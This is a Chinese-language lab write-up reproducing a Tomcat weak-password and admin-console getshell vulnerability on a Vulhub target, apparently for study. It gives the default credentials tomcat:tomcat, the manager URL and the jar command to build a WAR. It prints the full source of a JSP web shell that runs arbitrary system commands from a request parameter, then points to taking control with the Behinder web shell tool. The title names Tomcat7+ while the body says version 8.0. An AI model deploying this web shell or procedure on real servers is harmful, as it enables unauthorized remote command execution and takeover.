[漏洞復現] [Vulhub靶機] Tomcat7+ 弱口令 && 後臺getshell漏洞
阿新 • • 發佈:2022-05-18
免責宣告:本文僅供學習研究,嚴禁從事非法活動,任何後果由使用者本人負責。
0x00 背景知識
- tomcat中介軟體
- war檔案
- 木馬
0x01 漏洞介紹
- 影響範圍:Tomcat 8.0版本
- 漏洞型別:弱口令
- 漏洞成因:在tomcat8環境下,預設的後臺密碼為tomcat:tomcat,未修改預設密碼就會造成未經授權的後臺訪問。
0x02 漏洞復現
環境搭建:
漏洞利用
- 訪問靶機的tomcat管理頁面
http://your-ip:8080/manager/html
,輸入弱密碼tomcat:tomcat,訪問後臺並找到war檔案上傳位置。
- 準備木馬檔案ma.jsp,使用命令
jar -cvf ma.war ma.jsp
點選檢視木馬內容
<%@ page language="java" contentType="text/html; charset=GBK" pageEncoding="UTF-8"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>一句話木馬</title> </head> <body> <% if ("admin".equals(request.getParameter("pwd"))) { java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int len = -1; byte[] bytes = new byte[4092]; out.print("<pre>"); while ((len = input.read(bytes)) != -1) { out.println(new String(bytes, "GBK")); } out.print("</pre>"); } %> </body> </html>
- 上傳ma.war木馬檔案,可以看到頁面中出現了新的應用路徑
/ma
。
- 訪問jsp木馬URL並傳入引數
http://192.168.33.137:8080/ma/ma.jsp?pwd=admin&cmd=ls
,可以看到命令執行成功。
- 到此為止,已經可以控制
cmd
引數執行命令了。 - 再進一步,可以使用工具連線webshell進行目標管理,比如使用冰蠍控制。按照同樣的方法將冰蠍木馬打包成war格式並上傳,然後使用冰蠍進行連線。
參考連結